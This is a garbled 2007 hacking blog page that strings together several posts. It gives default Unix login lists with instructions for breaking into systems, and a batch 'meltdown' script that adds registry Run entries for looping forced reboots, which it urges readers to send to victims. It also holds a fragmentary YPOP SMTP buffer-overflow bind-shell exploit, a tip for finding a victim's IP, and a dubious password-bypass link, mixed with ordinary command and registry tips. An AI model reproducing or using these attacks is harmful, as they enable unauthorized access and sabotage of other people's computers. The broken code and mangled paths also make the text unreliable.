Wednesday, November 14, 2007

Hacking into Unix System?

I will be referring to all the UNIX variants/etc as UNIX, so when I say something about UNIX, it generally means all the variants (Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless I state a variant in particular.

Most commonly used passwords during the remote log

Login       Password
-------     --------
root root - Rarely open to hackers
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot * See Below
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
Public access Unixes [like public BBSs] will tell you how to logon if you are a new user. Unfortunately, this phile is not about public access Unixes, but I will talk about them briefly later, as a UUCP/UseNet/Bitnet address for mail. OK. You've gotten to the login prompt! Now, what you need to do here is enter a valid account. An account usually consists of 8 characters or less. After you enter an account, you will probably get a password prompt of some sort. The prompts may vary, as the source code to the login program is usually supplied with UNIX, or is readily available for free. Well, the easiest thing I can say to do to login is basically this: get an account, or try the defaults. The defaults are ones that came with the operating system, in standard form. The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power.

The REBOOT login is what is known as a command login, which simply doesn't let you into the operating system, but executes a program assigned to it. It usually does just what it says: reboot the system.

There are "command logins", which, like reboot, execute a command then log you off instead of letting you use the command interpreter. BSD is notorious for having these, and consequently, so do MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same
These are the most useful, since they will give the account names that are online, thus showing you several accounts that actually exist. When you enter an invalid account name, an invalid password, or both, you will get some kind of error. Usually it is the "login incorrect" message. When the computer tells you that, you have done something wrong by either entering an invalid account name, or a valid account name but an invalid password. It does not tell you which mistake you made, for obvious reasons. Also, when you login incorrectly, the error log on the system gets updated, letting the sysop(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change Directory." This means that no "home directory" exists for the account. The home directory is essentially the 'root' directory for an account, the directory you start off in. On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in /homedirectory. [Note: The / is used in directories on UNIX, not a \ ]. Most systems will log you off after this, but some tell you that they will put you in the root directory ['/'].

Another error is "No Shell". This means that no "shell" was defined for that particular account. The "shell" will be explained later. Some systems will log you off after this message. Others will tell you that they will use the regular shell, by saying "Using the bourne shell", or "Using sh".

User structure in the UNIX environment.

Think of UNIX as having two levels of security: absolute power, or just a regular user. The ones that have absolute power are those users at the root level. OK, now is the time to think in numbers. Unix associates numbers with account names. Each account will have a number. Some will have the same number. That number is the UID [user-id] of the account. The root user id is 0. Any account that has a user id of 0 will have root access. Unix does not deal with account names (logins) but rather the number associated with them. For instance, if my user-id is 50, and someone else's is 50, we both have absolute power over each other, but over no-one else.

A shell is an executable program which loads and runs when a user logs on, and is in the foreground. This "shell" can be any executable program, and it is defined in the "passwd" file, which is the user file. Each login can have a unique "shell". OK. Now the shell that we usually will work with is a command interpreter. A command interpreter is simply something like MSDOS's COMMAND.COM, which processes commands and sends them to the kernel [operating system]. A shell can be anything, as I said before, but the one you want to have is a command interpreter. Here are the usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix systems
csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not the same thing. This allows for many files to be able to be stored, since "Hill", "hill", "hIll", "hiLl", etc. can be different files. So, when using the [] stuff, you have to specify capital letters if any files you are dealing with have capital letters. Most everything is lower case though.

Commands to use?

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

$ ls
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
$ cat note.txt
This is a sample text file!

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
$ ls /usr/datwiz

pwd - gives current directory
$ pwd
$ cd src
$ pwd
$ cd ..
$ pwd
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
$ cd $home
[goto home dir]
$ pwd

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.
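As an added example (not from the original phile), here is a small POSIX shell script that turns the permission string ls -l prints (the "rwx--x--x" above) into the octal mode chmod also accepts, flags the world-writable case, and shows what "chmod a+r" changes on a throwaway file; the scratch directory and file name are made up for the demo.

```shell
#!/bin/sh
# Added example, not part of the original text: work with the 9-character
# permission string that "ls -l" prints (e.g. rwx--x--x).
# Positions 1-3 are the owner's rights, 4-6 the group's, 7-9 everyone else's.

# perm_to_octal rwx--x--x -> 711 (the number form that chmod also accepts).
# A lowercase s or t means set-id/sticky together with execute; this
# converter reports only the rwx part.
perm_to_octal() {
    perms=$1
    octal=""
    i=1
    while [ "$i" -le 7 ]; do
        triple=$(printf '%s' "$perms" | cut -c"$i"-"$((i + 2))")
        n=0
        case $triple in r??) n=$((n + 4)) ;; esac      # read    = 4
        case $triple in ?w?) n=$((n + 2)) ;; esac      # write   = 2
        case $triple in ??[xst]) n=$((n + 1)) ;; esac  # execute = 1
        octal="$octal$n"
        i=$((i + 3))
    done
    printf '%s\n' "$octal"
}

# world_writable PERMS: true when the "other" write bit (position 8) is
# set, i.e. every account on the system may modify the file.
world_writable() {
    case $1 in ???????w?) return 0 ;; *) return 1 ;; esac
}

# perm_string FILE: the permission string ls -l shows for FILE
# (column 1 is the file type, so we skip it).
perm_string() {
    ls -ld "$1" | cut -c2-10
}

# demo_chmod: create a file with the mode from the text (rwx--x--x),
# then "chmod a+r" it (a = all users, + = add, r = read) and report
# the before and after strings.
demo_chmod() {
    dir=$(mktemp -d)              # constructed scratch directory
    touch "$dir/runme"            # file name taken from the ls -l example
    chmod 711 "$dir/runme"        # 711 == rwx--x--x
    before=$(perm_string "$dir/runme")
    chmod a+r "$dir/runme"
    after=$(perm_string "$dir/runme")
    rm -rf "$dir"
    printf '%s -> %s\n' "$before" "$after"
}

demo_chmod
```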

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
"mail username@address" or
"mail username"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can receive Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "address" part
of the command and expand it into the full pathname usually. It could look
like this: mail phiber@optik

might have seen the mail bombing in the die hard 4 [
ps - process. This command allows you to see what you are actually doing
in memory. Every time you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. Usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
$ ps
122 001 ksh
123 001 watch
That is a shortened ps. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian".
kill - kill a process. This is used to terminate a program in memory,
obviously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill
(will explain EUID later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to the process telling it to terminate. If
you just use the syntax "kill pid" the process gets the default signal,
which it may catch or ignore, so it may never exit. So, you can specify
urgency! Try "kill -num pid". "kill -9 pid" is a definite kill almost
instantly, since signal 9 cannot be caught or ignored. So if I did this:
$ kill 122
$ kill 123
$ ps
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed

you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (will be explained later).

Hacking UNIX System?

The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read any more of this hacking phile, and can go straight to the
"Having Fun" section. Hacking can also be just to get others' accounts.

Getting IN
The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"
or Just
"Young Inc. Please login"

Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep them wondering. Why?
Well, you don't know if you've entered an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.

Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are the rwho, finger and who logins listed earlier.

If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use their login name as their password. For instance, the user
"bob" may have a password of "bob" or "bob1". This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young":
Young, INC. Please Login.
login: young
(c)1984 AT&T..

Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. Type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.

There are several files that are very important to the UNIX
environment. They are as follows:

/etc/passwd - This is probably the most important file on a Unix. Why?
Well, basically, it holds the valid usernames/passwords.
This is important since only those listed in the passwd
file can login, and even then some can't (will explain).
The format for the password file is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh
In the first line, sirhack is a valid user. The second
field, however, is supposed to be a password, right? Well,
it is, but it's encrypted with the DES encryption standard.
The part that says "&a,Ty" may include a date after the comma
(Ty) that tells unix when the password expires. Yes, the
date is encrypted into two alphanumeric characters (Ty).

In the Second example, the demo account has no password.
so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T

But with sirhack, you'd have to enter a password. Now,
the password file is great, since a lot of times, you'll
be able to browse through it to look for unpassworded
accounts. Remember that some accounts can be restricted
from logging in by putting a '*' in the password field.
The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell (explained later).
Note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time it's just random letters and numbers. It's chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. It's pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who
says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password. If they match, you're in. Now, there are password hackers, but they do not decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until they find a match (later on!). Remember, few, if any, have decrypted the password file successfully.
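The passwd-file checks an administrator runs against their own system follow from the points above (empty password field, '*' locks an account, UID 0 is root whatever the name, equal UIDs are the same user). This is an added example, not code from the original phile; the entries in the sample file are constructed for the demo and the hash strings are fake.

```shell
#!/bin/sh
# Added example, not part of the original text: audit a file in
# /etc/passwd format for the account weaknesses described above.
# Field layout: username:password:UID:GID:description:homedir:shell
# The entries below are constructed for the demo; the hashes are fake.

SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat >"$SAMPLE_PASSWD" <<'EOF'
root:Xk2p9qL.v7Rm6:0:0:Super User:/:/bin/sh
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh
guest::102:100:Guest Account:/usr/guest:/bin/sh
toor:Q1w2e3r4t5y6u:0:1:Second Root:/:/bin/sh
datwiz:*:103:100:Locked Account:/usr/datwiz:/bin/sh
EOF

# Accounts with an empty password field: the login program asks for no
# password at all, so anybody who knows the name can log in.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Accounts whose password field is "*": no crypt() result can ever equal
# it, so the account cannot be used at the login prompt.
locked_accounts() {
    awk -F: '$2 == "*" { print $1 }' "$1"
}

# Accounts with UID 0 that are not "root": UNIX checks the number, not
# the name, so each of these is a full root account.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# UIDs shared by more than one account, with the names that share them:
# the same UID means full power over each other's files and processes.
shared_uids() {
    awk -F: '{ count[$3]++; names[$3] = names[$3] " " $1 }
             END { for (u in count) if (count[u] > 1) print u ":" names[u] }' "$1"
}

# audit_passwd FILE: print a short report of every finding.
audit_passwd() {
    echo "== no password ==";           empty_password_accounts "$1"
    echo "== extra root (UID 0) ==";    extra_uid0_accounts "$1"
    echo "== shared UIDs ==";           shared_uids "$1"
    echo "== locked (*) ==";            locked_accounts "$1"
}

audit_passwd "$SAMPLE_PASSWD"
```

Point the functions at a real /etc/passwd to run the same checks there; on a modern system the password field holds an "x" and the hashes live in /etc/shadow, so the empty-field check must be repeated on that file.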


System Meltdown Script

System meltdown script .combination of different scripts so don't directly run it on ur pc or ur pc will have some serious probs ......... save it in notepad and then in dos shell convert it to .bat or .exe file and then send it to anyone and see him or her crying !!!! Rao! rao! hehe. Really kool and is such an easy script tat no antivirus can detect it coz its just a combination of different commands of batch programming nothing else !!!!! enjoy !!!

ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f


Ypop Smtp Remote Buffer Overflow Exploit?

This Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.

Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE

The EIP register will be overwritten and our code will be executed
here is a little exploit


/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h =
*-= ---------------------------------- =-


//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread

unsigned char shellcode[] =

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

int fd,bytes;

void usage(char *prog)
printf("Usage: %s \n",prog);
printf(" -h e.g (-h\n");
printf(" -p e.g (-p 25\n");
int main(int argc, char *argv[])
int arg,port,stack,i;
char evilbuf[1024];
char *hostname;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;

printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");

printf("- - - - - - - - - - - - - - - - - - - - - \n");

if(argc<4) {

while((arg=getopt(argc, argv, "h:p:t:")) != EOF) {
switch(arg) {
case 'h':
case 'p':

printf("[-] Error Resolving Hostname.. Failed\n");
printf("[+] Connecting to %s on port %i\n",hostname,port);

printf("[-] Socket Creation Failed.\n");
client.sin_family = AF_INET;
client.sin_port = htons(port);
client.sin_addr = *((struct in_addr *)he->h_addr);

if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);

printf("[+] Connected!\n");

if((bytes=recv(fd,buffer,300,0)) == NULL)
printf("[-] Error Receiving Welcome\n");
if((strstr(buffer,"220")==NULL) || (strstr(buffer,"YahooPOPs")==NULL) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");


printf("[+] Sending Evil Shellcode\n");

printf("[-] Error sending Shellcode\n");

printf("[+] Done. Now do:\n");
printf(" -> nc %s %i or\n",hostname,port);
printf(" -> telnet %s %i\n",hostname,port);


To send a file to a remote computer:

1. Open HyperTerminal.

2. Open a saved connection file or create a new connection.

3. Connect to the remote computer.

4. On the Transfer menu, click Send File.

5. In the Filename box, type the path and name of the file you want to send.

6. In the Protocol list, click the protocol your computer is using to send the file.

7. Click Send.

And make sure:

Both the sending computer and the receiving computer must be using the same file transfer protocol.

In most cases, you need to configure the file-transfer software on the remote computer so that it receives the file correctly. For more information, contact the administrator of the remote computer.

If you use the Zmodem protocol to transfer data, the remote computer will receive the file automatically and will not need to perform a manual receive procedure.

Be aware that the automatic download feature of the Zmodem protocol can pose a security risk by allowing remote users to send files to your computer without your explicit permission. To avoid this risk, you must select a protocol other than Zmodem or clear the Allow remote host initiated file transfers check box on the Settings tab of Connection Properties.

Add or remove restrictions?

If you want to make restrictions to what users can do or use on their computer without having to run Poledit, you can edit the Registry. You can add and delete Windows features in the key shown below.
Zero is Off and the value 1 is On. Example: to save Windows settings, add or modify the value name NoSaveSettings to 0; if set to 1, Windows will not save settings. And NoDeletePrinter set to 1 will prevent the user from deleting a printer.
The same key shows up at:
HKEY_USERS\(yourprofilename)\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer so change it there also if you are using different profiles.
1. Open RegEdit
2. Go to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
3. Go to the Explorer key (additional keys that can be created under Policies are System, Explorer, Network and WinOldApp)
4. You can then add DWORD or binary values set to 1 in the appropriate keys for ON and 0 for OFF.
NoDeletePrinter - Disables Deletion of Printers
NoAddPrinter - Disables Addition of Printers
NoRun - Disables Run Command
NoSetFolders - Removes Folders from Settings on Start Menu
NoSetTaskbar - Removes Taskbar from Settings on Start Menu
NoFind - Removes the Find Command
NoDrives - Hides Drives in My Computer
NoNetHood - Hides the Network Neighborhood
NoDesktop - Hides all icons on the Desktop
NoClose - Disables Shutdown
NoSaveSettings - Don't save settings on exit
DisableRegistryTools - Disables Registry Editing Tools
NoRecentDocsMenu - Hides the Documents shortcut at the Start button
NoRecentDocsHistory - Clears history of Documents
NoFileMenu - Hides the File Menu in Explorer
NoActiveDesktop - No Active Desktop
NoActiveDesktopChanges - No changes allowed
NoInternetIcon - No Internet Explorer Icon on the Desktop
NoFavoritesMenu - Hides the Favorites menu
NoChangeStartMenu - Disables changes to the Start Menu
NoFolderOptions - Hides the Folder Options in Explorer

firefox version 3 with all new features....try it


replace xx by tt

Shortcuts to your favourite websites?

Hate typing tha annoying long website address? Here's tha solution. With tha click of tha keyboard buttons within no time ur there in your favourite websites. hehe

yahoomail :- ytrytr ctrl+enter

microsoft :- mjumju ctrl+enter

youtube :- ygvygv ctrl+enter

orkut :- okmokm ctrl+enter

rediffmail :- rtyrty ctrl+enter

imagevenue :- ijnijn ctrl+enter

istockphoto :- iuyiuy ctrl+enter

bestbuy :- bgtbgt ctrl+enter

badongo :- bvcbvc ctrl+enter

careerbuilder:- cftcft ctrl+enter
nytimes :- nbvnbv ctrl+enter

netflix :- nhynhy ctrl+enter

rapidshare :- rfvrfv ctrl+enter :- uytuyt ctrl+enter :- vgyvgy ctrl+enter

usatoday :- uhbuhb ctrl+enter

uwants :- ujmujm ctrl+enter :- xdrxdr ctrl+enter :- xswxsw ctrl+enter

myrealdoor :- mnbmnb ctrl+enter

how to access another computer?

if i have the ip address of a comp & it is connected to lan with my comp then how can i access that comp.............

N.B- i can access the share document ,,but i want to access the hole f.d

is it possible...................

pls explain that....................

& what is remote comp................

Remote Computer is a computer other than urs in your network...

it is possible to access only shared folders. There is another type called admin share .. which allows to access computer by its administrator account..

Dos Command "net accounts" can be used to display the user accounts database and modify password and logon requirements for all accounts.

Syntax: net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
Examples:
1) To display the current settings, the password requirements, and the server role for a server, type: net accounts
2) To force users to log off after the logon time expires with a five-minute warning, type: net accounts /forcelogoff:5

for more such commands visit to :

if u still want some clarification...

get ip via msn yahoo etc

Share something wid him..mayb a song or some picture..worth 2mb..nd then go to start>Run>Cmd nd then type netstat -n nd then u ll see a lot of ip's wid lotta ports..see the port number 5101 nd thatz the victim's ip...

secretly add buddies to your yahoo id


Orkut Yahoo Gmail login withut Password

hey friends i found software on net by which we can login any orkut gmail and yahoo ids
we just have to write user name and press login button it will open account automatically without password.Here is the link


replace xx with tt